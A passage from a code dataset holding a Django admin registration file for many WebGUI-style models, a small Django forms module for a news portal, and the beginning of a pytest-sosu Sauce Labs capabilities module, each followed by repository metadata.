'revision_date',\n 'mail_style_template_id',\n )\n\n\nclass AssetAspectRssFeedAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'items_per_feed',\n 'feed_copyright',\n 'feed_title',\n 'feed_description',\n 'feed_image',\n 'feed_image_link',\n 'feed_image_description',\n 'feed_header_links',\n )\n\n\nclass AssetAspectSubscriberAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'subscription_group',\n 'subscription_enabled',\n 'always_confirm_subscription',\n 'allow_anonymous_subscription',\n 'confirmation_required_template_id',\n 'confirmation_email_template_id',\n 'confirmation_email_subject',\n 'no_mutation_email_template_id',\n 'no_mutation_email_subject',\n 'list_name',\n 'confirm_mutation_template_id',\n )\n list_filter = ('subscription_group',)\n\n\nclass AssetAspectSubscriberLogAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'request_ip',\n 'request_date',\n 'confirmation_ip',\n 'confirmation_date',\n 'user',\n 'email',\n 'type',\n 'anonymous',\n 'confirmed',\n 'code',\n )\n list_filter = ('user',)\n\n\nclass AssetDataAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'revised_by',\n 'tag_id',\n 'status',\n 'title',\n 'menu_title',\n 'url',\n 'owner_user',\n 'group_id_view',\n 'group_id_edit',\n 'synopsis',\n 'new_window',\n 'is_hidden',\n 'is_package',\n 'is_prototype',\n 'encrypt_page',\n 'asset_size',\n 'extra_head_tags',\n 'skip_notification',\n 'is_exportable',\n 'inherit_url_from_parent',\n 'last_modified',\n 'extra_head_tags_packed',\n 'use_packed_head_tags',\n )\n list_filter = ('owner_user',)\n\n\nclass AssetHistoryAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'user',\n 'date_stamp',\n 'action_taken',\n 'url',\n )\n list_filter = ('user',)\n\n\nclass AssetIndexAdmin(admin.ModelAdmin):\n\n list_display = (\n 'asset_id',\n 'title',\n 'synopsis',\n 'url',\n 'creation_date',\n 'revision_date',\n 'owner_user',\n 'group_id_view',\n 'group_id_edit',\n 'lineage',\n 'class_name',\n 'is_public',\n 'keywords',\n )\n list_filter = ('owner_user',)\n\n\nclass AssetKeywordAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'keyword', 'asset_id')\n\n\nclass AssetVersionTagAdmin(admin.ModelAdmin):\n\n list_display = (\n 'tag_id',\n 'name',\n 'is_committed',\n 'creation_date',\n 'created_by',\n 'commit_date',\n 'committed_by',\n 'is_locked',\n 'locked_by',\n 'group_to_use',\n 'workflow_id',\n 'workflow_instance_id',\n 'comments',\n 'start_time',\n 'end_time',\n 'is_site_wide',\n )\n list_filter = ('start_time', 'end_time')\n search_fields = ('name',)\n\n\nclass AuthenticationAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'user',\n 'auth_method',\n 'field_name',\n 'password_base64',\n )\n list_filter = ('user',)\n\n\nclass BucketLogAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'user', 'bucket', 'duration', 'time_stamp')\n list_filter = ('user', 'time_stamp')\n\n\nclass CacheAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'namespace',\n 'cachekey',\n 'expires',\n 'size',\n 'content',\n )\n\n\nclass CartAdmin(admin.ModelAdmin):\n\n list_display = (\n 'cart_id',\n 'session_id',\n 'shipping_address_id',\n 'shipper_id',\n 'pos_user',\n 'creation_date',\n )\n list_filter = ('pos_user',)\n\n\nclass CartItemAdmin(admin.ModelAdmin):\n\n list_display = (\n 'item_id',\n 'cart_id',\n 'asset_id',\n 'date_added',\n 'options',\n 'configured_title',\n 'shipping_address_id',\n 'quantity',\n )\n list_filter = ('date_added',)\n\n\nclass DatabaseLinkAdmin(admin.ModelAdmin):\n\n list_display = (\n 'database_link_id',\n 'title',\n 'dsn',\n 'username',\n 'identifier',\n 'allowed_keywords',\n 'allow_macro_access',\n 'additional_parameters',\n )\n\n\nclass DeltaLogAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'user', 'asset_id', 'delta', 'time_stamp', 'url')\n list_filter = ('user',)\n\n\nclass DonationAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'default_price',\n 'thank_you_message',\n 'template_id',\n )\n\n\nclass FilePumpBundleAdmin(admin.ModelAdmin):\n\n list_display = (\n 'bundle_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'bundle_name',\n 'last_modified',\n 'last_build',\n 'js_files',\n 'css_files',\n 'other_files',\n )\n list_filter = ('date_created', 'last_updated')\n\n\nclass FriendInvitationAdmin(admin.ModelAdmin):\n\n list_display = (\n 'invite_id',\n 'inviter_id',\n 'friend_id',\n 'date_sent',\n 'comments',\n 'message_id',\n )\n list_filter = ('date_sent',)\n\n\nclass GroupGroupingAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'group', 'in_group')\n list_filter = ('group',)\n\n\nclass GroupingAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'group', 'user', 'expire_date', 'group_admin')\n list_filter = ('group', 'user')\n\n\nclass GroupAdmin(admin.ModelAdmin):\n\n list_display = (\n 'id',\n 'name',\n 'description',\n 'expire_offset',\n 'karma_threshold',\n 'ip_filter',\n 'date_created',\n 'last_updated',\n 'delete_offset',\n 'expire_notify_offset',\n 'expire_notify_message',\n 'expire_notify',\n 'scratch_filter',\n 'auto_add',\n 'auto_delete',\n 'database_link_id',\n 'group_cache_timeout',\n 'db_query',\n 'is_editable',\n 'show_in_forms',\n 'ldap_group',\n 'ldap_group_property',\n 'ldap_recursive_property',\n 'ldap_link_id',\n 'ldap_recursive_filter',\n 'is_ad_hoc_mail_group',\n )\n raw_id_fields = ('users',)\n search_fields = ('name',)\n\n\nclass ImageColorAdmin(admin.ModelAdmin):\n\n list_display = (\n 'color_id',\n 'name',\n 'fill_triplet',\n 'fill_alpha',\n 'stroke_triplet',\n 'stroke_alpha',\n )\n search_fields = ('name',)\n\n\nclass ImageFontAdmin(admin.ModelAdmin):\n\n list_display = ('font_id', 'name', 'storage_id', 'filename')\n search_fields = ('name',)\n\n\nclass ImagePaletteAdmin(admin.ModelAdmin):\n\n list_display = ('palette_id', 'name')\n search_fields = ('name',)\n\n\nclass ImagePaletteColorAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'palette_id', 'color_id', 'palette_order')\n\n\nclass InboxAdmin(admin.ModelAdmin):\n\n list_display = (\n 'message_id',\n 'status',\n 'date_stamp',\n 'completed_on',\n 'completed_by',\n 'user',\n 'group',\n 'subject',\n 'message',\n 'sent_by',\n )\n list_filter = ('user', 'group')\n\n\nclass InboxMessageStateAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'message_id',\n 'user',\n 'is_read',\n 'replied_to',\n 'deleted',\n )\n list_filter = ('user',)\n\n\nclass IncrementerAdmin(admin.ModelAdmin):\n\n list_display = ('incrementer_id', 'next_value')\n\n\nclass KarmaLogAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'user',\n 'amount',\n 'source',\n 'description',\n 'date_modified',\n )\n list_filter = ('user',)\n\n\nclass LdapLinkAdmin(admin.ModelAdmin):\n\n list_display = (\n 'ldap_link_id',\n 'ldap_link_name',\n 'ldap_url',\n 'connect_dn',\n 'identifier',\n 'ldap_user_rdn',\n 'ldap_identity',\n 'ldap_identity_name',\n 'ldap_password_name',\n 'ldap_send_welcome_message',\n 'ldap_welcome_message',\n 'ldap_account_template',\n 'ldap_create_account_template',\n 'ldap_login_template',\n 'ldap_global_recursive_filter',\n )\n\n\nclass MailQueueAdmin(admin.ModelAdmin):\n\n list_display = ('message_id', 'message', 'to_group', 'is_inbox')\n\n\nclass MetaDataPropertiesAdmin(admin.ModelAdmin):\n\n list_display = (\n 'field_id',\n 'field_name',\n 'description',\n 'field_type',\n 'possible_values',\n 'default_value',\n )\n\n\nclass MetaDataValuesAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'field_id', 'value', 'asset_id')\n\n\nclass PassiveAnalyticsStatusAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'start_date', 'end_date', 'running', 'user')\n list_filter = ('start_date', 'end_date', 'user')\n\n\nclass PassiveLogAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'user',\n 'asset_id',\n 'session_id',\n 'time_stamp',\n 'url',\n )\n list_filter = ('user',)\n\n\nclass PassiveProfileAOIAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'user', 'field_id', 'value', 'count')\n list_filter = ('user',)\n\n\nclass PassiveProfileLogAdmin(admin.ModelAdmin):\n\n list_display = (\n 'passive_profile_log_id',\n 'user',\n 'session_id',\n 'asset_id',\n 'date_of_entry',\n )\n list_filter = ('user',)\n\n\nclass PaymentGatewayAdmin(admin.ModelAdmin):\n\n list_display = ('payment_gateway_id', 'class_name', 'options')\n\n\nclass RedirectAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'redirect_url',\n 'revision_date',\n 'redirect_type',\n )\n\n\nclass ReplacementsAdmin(admin.ModelAdmin):\n\n list_display = ('replacement_id', 'search_for', 'replace_with')\n\n\nclass SearchAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'class_limiter',\n 'search_root',\n 'template_id',\n 'use_containers',\n 'paginate_after',\n )\n\n\nclass SettingsAdmin(admin.ModelAdmin):\n\n list_display = ('name', 'value')\n search_fields = ('name',)\n\n\nclass ShipperAdmin(admin.ModelAdmin):\n\n list_display = ('shipper_id', 'class_name', 'options')\n\n\nclass ShopCreditAdmin(admin.ModelAdmin):\n\n list_display = (\n 'credit_id',\n 'user',\n 'amount',\n 'comment',\n 'date_of_adjustment',\n )\n list_filter = ('user', 'date_of_adjustment')\n\n\nclass SkuAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'description',\n 'sku',\n 'vendor',\n 'display_title',\n 'override_tax_rate',\n 'tax_rate_override',\n 'tax_configuration',\n 'ships_separately',\n )\n list_filter = ('vendor',)\n\n\nclass SnippetAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'snippet',\n 'process_as_template',\n 'mime_type',\n 'revision_date',\n 'cache_timeout',\n 'snippet_packed',\n 'use_packed',\n )\n\n\nclass TaxDriverAdmin(admin.ModelAdmin):\n\n list_display = ('class_name', 'options')\n\n\nclass TaxEuVatNumbersAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'user',\n 'country_code',\n 'vat_number',\n 'vies_validated',\n 'vies_error_code',\n 'approved',\n )\n list_filter = ('user',)\n\n\nclass TaxGenericRatesAdmin(admin.ModelAdmin):\n\n list_display = ('tax_id', 'country', 'state', 'city', 'code', 'tax_rate')\n\n\nclass TemplateAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'template',\n 'namespace',\n 'is_editable',\n 'show_in_forms',\n 'asset_id',\n 'revision_date',\n 'parser',\n 'is_default',\n 'template_packed',\n 'use_packed',\n )\n\n\nclass TemplateAttachmentsAdmin(admin.ModelAdmin):\n\n list_display = (\n 'template_id',\n 'revision_date',\n 'url',\n 'type',\n 'sequence',\n 'attach_id',\n )\n\n\nclass TransactionItemAdmin(admin.ModelAdmin):\n\n list_display = (\n 'item_id',\n 'transaction_id',\n 'asset_id',\n 'configured_title',\n 'options',\n 'shipping_address_id',\n 'shipping_name',\n 'shipping_address1',\n 'shipping_address2',\n 'shipping_address3',\n 'shipping_city',\n 'shipping_state',\n 'shipping_country',\n 'shipping_code',\n 'shipping_phone_number',\n 'shipping_tracking_number',\n 'order_status',\n 'last_updated',\n 'quantity',\n 'price',\n 'vendor',\n 'vendor_payout_status',\n 'vendor_payout_amount',\n 'tax_rate',\n 'tax_configuration',\n )\n list_filter = ('last_updated', 'vendor')\n\n\nclass UserLoginLogAdmin(admin.ModelAdmin):\n list_display = (\n u'id',\n 'user',\n 'status',\n 'time_stamp',\n 'ip_address',\n 'user_agent',\n 'session_id',\n 'last_page_viewed',\n )\n\n\nclass UserProfileCategoryAdmin(admin.ModelAdmin):\n\n list_display = (\n 'profile_category_id',\n 'label',\n 'short_label',\n 'sequence_number',\n 'visible',\n 'editable',\n 'protected',\n )\n\n\nclass UserProfileDataAdmin(admin.ModelAdmin):\n search_fields = ['email', 'first_name', 'last_name']\n raw_id_fields = ('user',)\n list_display = (\n 'user',\n 'email',\n 'first_name',\n 'middle_name',\n 'last_name',\n 'icq',\n 'aim',\n 'msn_im',\n 'yahoo_im',\n 'cell_phone',\n 'pager',\n 'email_to_pager',\n 'language',\n 'home_address',\n 'home_city',\n 'home_state',\n 'home_zip',\n 'home_country',\n 'home_phone',\n 'work_address',\n 'work_city',\n 'work_state',\n 'work_zip',\n 'work_country',\n 'work_phone',\n 'gender',\n 'birthdate',\n 'home_url',\n 'work_url',\n 'work_name',\n 'time_zone',\n 'date_format',\n 'time_format',\n 'discussion_layout',\n 'first_day_of_week',\n 'ui_level',\n 'alias',\n 'signature',\n 'public_profile',\n 'toolbar',\n 'photo',\n 'avatar',\n 'department',\n 'allow_private_messages',\n 'able_to_be_friend',\n 'show_message_on_login_seen',\n 'show_online',\n 'version_tag_mode',\n 'wg_privacy_settings',\n 'receive_inbox_email_notifications',\n 'receive_inbox_sms_notifications',\n )\n list_filter = ('user',)\n\n\nclass UserProfileFieldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'field_name',\n 'label',\n 'visible',\n 'required',\n 'field_type',\n 'possible_values',\n 'data_default',\n 'sequence_number',\n 'profile_category_id',\n 'protected',\n 'editable',\n 'force_image_only',\n 'show_at_registration',\n 'required_for_password_recovery',\n 'extras',\n 'default_privacy_setting',\n )\n\n\nclass UserSessionAdmin(admin.ModelAdmin):\n\n list_display = (\n 'session_id',\n 'expires',\n 'last_page_view',\n 'admin_on',\n 'last_ip',\n 'user',\n )\n list_filter = ('user',)\n\n\nclass UserSessionScratchAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'session_id', 'name', 'value')\n search_fields = ('name',)\n\n\nclass UserprefAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'username', 'preference', 'value')\n\n\nclass UserAdmin(admin.ModelAdmin):\n search_fields = ('username',)\n list_display = (\n 'id',\n 'username',\n 'auth_method',\n 'date_created',\n 'last_updated',\n 'karma',\n 'status',\n 'referring_affiliate',\n 'friends_group',\n )\n\n\nclass UsersSpecialStateAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'user', 'special_state')\n list_filter = ('user',)\n\n\nclass VendorAdmin(admin.ModelAdmin):\n\n list_display = (\n 'id',\n 'date_created',\n 'name',\n 'user',\n 'preferred_payment_type',\n 'payment_information',\n 'payment_address_id',\n 'url',\n )\n list_filter = ('date_created', 'user')\n search_fields = ('name',)\n\n\nclass WebguiVersionAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'webgui_version', 'version_type', 'date_applied')\n\n\nclass WobjectAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'display_title',\n 'description',\n 'asset_id',\n 'style_template_id',\n 'printable_style_template_id',\n 'revision_date',\n 'mobile_style_template_id',\n )\n\n\ndef _register(model, admin_class):\n admin.site.register(model, admin_class)\n\n\n_register(models.AdSku, AdSkuAdmin)\n_register(models.Article, ArticleAdmin)\n_register(models.Calendar, CalendarAdmin)\n_register(models.Carousel, CarouselAdmin)\n_register(models.DataForm, DataFormAdmin)\n_register(models.DataFormEntry, DataFormEntryAdmin)\n_register(models.DataTable, DataTableAdmin)\n_register(models.EMSBadge, EMSBadgeAdmin)\n_register(models.EMSBadgeGroup, EMSBadgeGroupAdmin)\n_register(models.EMSEventMetaField, EMSEventMetaFieldAdmin)\n_register(models.EMSRegistrant, EMSRegistrantAdmin)\n_register(models.EMSRegistrantRibbon, EMSRegistrantRibbonAdmin)\n_register(models.EMSRegistrantTicket, EMSRegistrantTicketAdmin)\n_register(models.EMSRegistrantToken, EMSRegistrantTokenAdmin)\n_register(models.EMSRibbon, EMSRibbonAdmin)\n_register(models.EMSTicket, EMSTicketAdmin)\n_register(models.EMSToken, EMSTokenAdmin)\n_register(models.Event, EventAdmin)\n_register(models.EventManagementSystem, EventManagementSystemAdmin)\n_register(models.EventRecur, EventRecurAdmin)\n_register(models.EventRelatedlink, EventRelatedlinkAdmin)\n_register(models.FileAsset, FileAssetAdmin)\n_register(models.FlatDiscount, FlatDiscountAdmin)\n_register(models.Folder, FolderAdmin)\n_register(models.Gallery, GalleryAdmin)\n_register(models.GalleryAlbum, GalleryAlbumAdmin)\n_register(models.GalleryFile, GalleryFileAdmin)\n_register(models.GalleryFileComment, GalleryFileCommentAdmin)\n_register(models.HttpProxy, HttpProxyAdmin)\n_register(models.ImageAsset, ImageAssetAdmin)\n_register(models.KBAuth, KBAuthAdmin)\n_register(models.Layout, LayoutAdmin)\n_register(models.MacroAttendEvent, MacroAttendEventAdmin)\n_register(models.Mailing, MailingAdmin)\n_register(models.MailingEmail, MailingEmailAdmin)\n_register(models.MailmanManager, MailmanManagerAdmin)\n_register(models.MailmanManagerGroupsInList, MailmanManagerGroupsInListAdmin)\n_register(models.MailmanManagerList, MailmanManagerListAdmin)\n_register(\n models.MailmanManagerSubscribeConfirmation,\n MailmanManagerSubscribeConfirmationAdmin)\n_register(models.Map, MapAdmin)\n_register(models.MapPoint, MapPointAdmin)\n_register(models.Matrix, MatrixAdmin)\n_register(models.MatrixListing, MatrixListingAdmin)\n_register(models.MatrixListingAttribute, MatrixListingAttributeAdmin)\n_register(models.MatrixListingRating, MatrixListingRatingAdmin)\n_register(models.MatrixListingRatingSummary, MatrixListingRatingSummaryAdmin)\n_register(models.MatrixAttribute, MatrixAttributeAdmin)\n_register(models.MessageBoard, MessageBoardAdmin)\n_register(models.MultiSearch, MultiSearchAdmin)\n_register(models.Navigation, NavigationAdmin)\n_register(models.Newsletter, NewsletterAdmin)\n_register(models.NewsletterCollection, NewsletterCollectionAdmin)\n_register(models.NewsletterSubscription, NewsletterSubscriptionAdmin)\n_register(models.PMProject, PMProjectAdmin)\n_register(models.PMTask, PMTaskAdmin)\n_register(models.PMTaskResource, PMTaskResourceAdmin)\n_register(models.PMWobject, PMWobjectAdmin)\n_register(models.Photo, PhotoAdmin)\n_register(models.PhotoRating, PhotoRatingAdmin)\n_register(models.Poll, PollAdmin)\n_register(models.PollAnswer, PollAnswerAdmin)\n_register(models.Post, PostAdmin)\n_register(models.PostRating, PostRatingAdmin)\n_register(models.Product, ProductAdmin)\n_register(models.RichEdit, RichEditAdmin)\n_register(models.SQLReport, SQLReportAdmin)\n_register(models.Shelf, ShelfAdmin)\n_register(models.Shortcut, ShortcutAdmin)\n_register(models.ShortcutOverride, ShortcutOverrideAdmin)\n_register(models.StockData, StockDataAdmin)\n_register(models.Story, StoryAdmin)\n_register(models.StoryArchive, StoryArchiveAdmin)\n_register(models.StoryTopic, StoryTopicAdmin)\n_register(models.Subscription, SubscriptionAdmin)\n_register(models.SubscriptionCode, SubscriptionCodeAdmin)\n_register(models.SubscriptionCodeBatch, SubscriptionCodeBatchAdmin)\n_register(models.Survey, SurveyAdmin)\n_register(models.SurveyAnswerOld, SurveyAnswerOldAdmin)\n_register(models.SurveyOld, SurveyOldAdmin)\n_register(models.SurveyQuestionResponseOld, SurveyQuestionResponseOldAdmin)\n_register(models.SurveyQuestionType, SurveyQuestionTypeAdmin)\n_register(models.SurveyQuestionOld, SurveyQuestionOldAdmin)\n_register(models.SurveyResponse, SurveyResponseAdmin)\n_register(models.SurveyResponseOld, SurveyResponseOldAdmin)\n_register(models.SurveySectionOld, SurveySectionOldAdmin)\n_register(models.SurveyTempReport, SurveyTempReportAdmin)\n_register(models.SurveyTest, SurveyTestAdmin)\n_register(models.SyndicatedContent, SyndicatedContentAdmin)\n_register(models.TTProjectList, TTProjectListAdmin)\n_register(models.TTProjectResourceList, TTProjectResourceListAdmin)\n_register(models.TTProjectTask, TTProjectTaskAdmin)\n_register(models.TTReport, TTReportAdmin)\n_register(models.TTTimeEntry, TTTimeEntryAdmin)\n_register(models.TTWobject, TTWobjectAdmin)\n_register(models.Thingy, ThingyAdmin)\n_register(models.ThingyRecord, ThingyRecordAdmin)\n_register(models.ThingyRecordRecord, ThingyRecordRecordAdmin)\n_register(models.ThingyField, ThingyFieldAdmin)\n_register(\n models.ThingyIkgQcHs3rCevOFoHUiU8kg,\n ThingyIkgQcHs3rCevOFoHUiU8kgAdmin)\n_register(models.ThingyThing, ThingyThingAdmin)\n_register(models.Thread, ThreadAdmin)\n_register(models.ThreadRead, ThreadReadAdmin)\n_register(models.WeatherData, WeatherDataAdmin)\n_register(models.WikiMaster, WikiMasterAdmin)\n_register(models.WikiPage, WikiPageAdmin)\n_register(models.Workflow, WorkflowAdmin)\n_register(models.WorkflowActivity, WorkflowActivityAdmin)\n_register(models.WorkflowActivityData, WorkflowActivityDataAdmin)\n_register(models.WorkflowInstance, WorkflowInstanceAdmin)\n_register(models.WorkflowInstanceScratch, WorkflowInstanceScratchAdmin)\n_register(models.WorkflowSchedule, WorkflowScheduleAdmin)\n_register(models.ZipArchiveAsset, ZipArchiveAssetAdmin)\n_register(models.AdSkuPurchase, AdSkuPurchaseAdmin)\n_register(models.AdSpace, AdSpaceAdmin)\n_register(models.Address, AddressAdmin)\n_register(models.AddressBook, AddressBookAdmin)\n_register(models.Advertisement, AdvertisementAdmin)\n_register(models.AnalyticRule, AnalyticRuleAdmin)\n_register(models.Asset, AssetAdmin)\n_register(models.AssetAspectComment, AssetAspectCommentAdmin)\n_register(models.AssetAspectMailable, AssetAspectMailableAdmin)\n_register(models.AssetAspectRssFeed, AssetAspectRssFeedAdmin)\n_register(models.AssetAspectSubscriber, AssetAspectSubscriberAdmin)\n_register(models.AssetAspectSubscriberLog, AssetAspectSubscriberLogAdmin)\n_register(models.AssetData, AssetDataAdmin)\n_register(models.AssetHistory, AssetHistoryAdmin)\n_register(models.AssetIndex, AssetIndexAdmin)\n_register(models.AssetKeyword, AssetKeywordAdmin)\n_register(models.AssetVersionTag, AssetVersionTagAdmin)\n_register(models.Authentication, AuthenticationAdmin)\n_register(models.BucketLog, BucketLogAdmin)\n_register(models.Cache, CacheAdmin)\n_register(models.Cart, CartAdmin)\n_register(models.CartItem, CartItemAdmin)\n_register(models.DatabaseLink, DatabaseLinkAdmin)\n_register(models.DeltaLog, DeltaLogAdmin)\n_register(models.Donation, DonationAdmin)\n_register(models.FilePumpBundle, FilePumpBundleAdmin)\n_register(models.FriendInvitation, FriendInvitationAdmin)\n_register(models.GroupGrouping, GroupGroupingAdmin)\n_register(models.Grouping, GroupingAdmin)\n_register(models.Group, GroupAdmin)\n_register(models.ImageColor, ImageColorAdmin)\n_register(models.ImageFont, ImageFontAdmin)\n_register(models.ImagePalette, ImagePaletteAdmin)\n_register(models.ImagePaletteColor, ImagePaletteColorAdmin)\n_register(models.Inbox, InboxAdmin)\n_register(models.InboxMessageState, InboxMessageStateAdmin)\n_register(models.Incrementer, IncrementerAdmin)\n_register(models.KarmaLog, KarmaLogAdmin)\n_register(models.LdapLink, LdapLinkAdmin)\n_register(models.MailQueue, MailQueueAdmin)\n_register(models.MetaDataProperties, MetaDataPropertiesAdmin)\n_register(models.MetaDataValues, MetaDataValuesAdmin)\n_register(models.PassiveAnalyticsStatus, PassiveAnalyticsStatusAdmin)\n_register(models.PassiveLog, PassiveLogAdmin)\n_register(models.PassiveProfileAOI, PassiveProfileAOIAdmin)\n_register(models.PassiveProfileLog, PassiveProfileLogAdmin)\n_register(models.PaymentGateway, PaymentGatewayAdmin)\n_register(models.Redirect, RedirectAdmin)\n_register(models.Replacements, ReplacementsAdmin)\n_register(models.Search, SearchAdmin)\n_register(models.Settings, SettingsAdmin)\n_register(models.Shipper, ShipperAdmin)\n_register(models.ShopCredit, ShopCreditAdmin)\n_register(models.Sku, SkuAdmin)\n_register(models.Snippet, SnippetAdmin)\n_register(models.TaxDriver, TaxDriverAdmin)\n_register(models.TaxEuVatNumbers, TaxEuVatNumbersAdmin)\n_register(models.TaxGenericRates, TaxGenericRatesAdmin)\n_register(models.Template, TemplateAdmin)\n_register(models.TemplateAttachments, TemplateAttachmentsAdmin)\n_register(models.TransactionItem, TransactionItemAdmin)\n_register(models.UserLoginLog, UserLoginLogAdmin)\n_register(models.UserProfileCategory, UserProfileCategoryAdmin)\n_register(models.UserProfileData, UserProfileDataAdmin)\n_register(models.UserProfileField, UserProfileFieldAdmin)\n_register(models.UserSession, UserSessionAdmin)\n_register(models.UserSessionScratch, UserSessionScratchAdmin)\n_register(models.Userpref, UserprefAdmin)\n_register(models.User, UserAdmin)\n_register(models.UsersSpecialState, UsersSpecialStateAdmin)\n_register(models.Vendor, VendorAdmin)\n_register(models.WebguiVersion, WebguiVersionAdmin)\n_register(models.Wobject, WobjectAdmin)\n","repo_name":"wolph/dinner","sub_path":"koornbeurs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":66498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20333925653","text":"from django import forms\nfrom .models import Post\n\nclass PostForm(forms.ModelForm):\n title = forms.CharField(label='Заголовок', max_length=20)\n category_post = forms.CharField(label='Категория')\n class Meta:\n model = Post\n fields = [\n 'title',\n 'category_post',\n ]\n\nclass PostCreate(forms.ModelForm):\n title = forms.CharField(label='Заголовок', max_length=20)\n\n class Meta:\n model = Post\n fields = [\n 'title',\n 'text',\n 'author',\n ]\n\n labels = {'text': 'Текст', 'author': 'Автор'}\n\n\n\n\n\n\n\n","repo_name":"Sergo0196/NewsPortal","sub_path":"HomeWork/NewsPortal/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7189601014","text":"from __future__ import annotations\n\nimport dataclasses\nimport enum\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, Iterator, List, Optional, Sequence, Union\n\nfrom pytest_sosu.logging import get_struct_logger\nfrom pytest_sosu.utils import (\n ImmutableDict,\n convert_snake_case_to_camel_case,\n try_one_of,\n try_one_of_or_none,\n)\nfrom pytest_sosu.webdriver.compat import selenium_version\nfrom pytest_sosu.webdriver.platforms import Browser, Platform\n\nlogger = get_struct_logger(__name__)\n\n\nclass SauceTestResultsVisibility(enum.Enum):\n PUBLIC = \"public\"\n PUBLIC_RESTRICTED = \"public restricted\"\n SHARE = \"share\"\n TEAM = \"team\"\n PRIVATE = \"private\"\n\n\n# pylint: disable=too-many-instance-attributes\n@dataclass(frozen=True)\nclass SauceOptions:\n name: Optional[str] = None\n build: Optional[str] = None\n tags: Optional[List[str]] = None\n username: Optional[str] = None\n access_key: Optional[str] = None\n custom_data: Optional[Dict[str, Any]] = None\n visibility: Optional[SauceTestResultsVisibility] = None\n tunnel_name: Optional[str] = None\n tunnel_identifier: Optional[str] = None\n tunnel_owner: Optional[str] = None\n parent_tunnel: Optional[str] = None\n record_video: Optional[bool] = None\n video_upload_on_pass: Optional[bool] = None\n record_screenshots: Optional[bool] = None\n record_logs: Optional[bool] = None\n max_duration: Optional[int] = None\n idle_timeout: Optional[int] = None\n command_timeout: Optional[int] = None\n screen_resolution: Optional[str] = None\n extras: ImmutableDict[str, Any] = dataclasses.field(\n default_factory=lambda: ImmutableDict({}),\n )\n\n auto_include_selenium_version: Optional[bool] = None\n\n TO_DICT_AUTO_EXCLUDES = (\n \"custom_data\",\n \"visibility\",\n \"auto_include_selenium_version\",\n \"extras\",\n )\n\n @classmethod\n def default(cls) -> SauceOptions:\n return cls()\n\n def __structlog__(self):\n return self.to_dict()\n\n def merge(self, other: SauceOptions) -> SauceOptions:\n kwargs: Dict[str, Any] = {}\n for field in dataclasses.fields(self):\n name = field.name\n if name == \"extras\":\n continue\n kwargs[name] = self._merge_field(other, name)\n kwargs[\"extras\"] = self.extras.merge(other.extras)\n new_opts = SauceOptions(**kwargs)\n return new_opts\n\n def _merge_field(self, other, name):\n return try_one_of_or_none(\n getattr(other, name),\n lambda: getattr(self, name),\n )\n\n def to_dict(\n self, auto_include_selenium_version: Optional[bool] = None\n ) -> Dict[str, Union[str, int, float]]:\n auto_include_selenium_version = try_one_of(\n auto_include_selenium_version,\n lambda: self.auto_include_selenium_version,\n default=False,\n )\n\n data: Dict[str, Any] = {}\n if auto_include_selenium_version and selenium_version:\n data[\"seleniumVersion\"] = selenium_version\n for field in dataclasses.fields(self):\n name = field.name\n if name in self.TO_DICT_AUTO_EXCLUDES:\n continue\n value = getattr(self, name)\n if value is None:\n continue\n dict_name = convert_snake_case_to_camel_case(name)\n data[dict_name] = value\n if self.custom_data is not None:\n data[\"custom-data\"] = self.custom_data\n if self.visibility is not None:\n data[\"public\"] = self.visibility.value\n data.update(self.extras)\n return data\n\n\n@dataclass(frozen=True)\nclass Capabilities:\n browser: Optional[Browser] = Browser.default()\n platform: Optional[Platform] = Platform.default()\n sauce_options: SauceOptions = SauceOptions.default()\n extras: ImmutableDict[str, Any] = dataclasses.field(\n default_factory=lambda: ImmutableDict({}),\n )\n\n w3c_mode: Optional[bool] = None\n\n @property\n def slug(self):\n if self.browser is None and self.platform is None:\n return \"default\"\n if self.platform is None:\n return self.browser.slug\n if self.browser is None:\n return self.platform.slug\n return f\"{self.browser.slug}-on-{self.platform.slug}\"\n\n def __structlog__(self):\n return self.to_dict()\n\n def merge(self, other: Capabilities) -> Capabilities:\n new_caps = Capabilities(\n browser=try_one_of_or_none(other.browser, lambda: self.browser),\n platform=try_one_of_or_none(other.platform, lambda: self.platform),\n 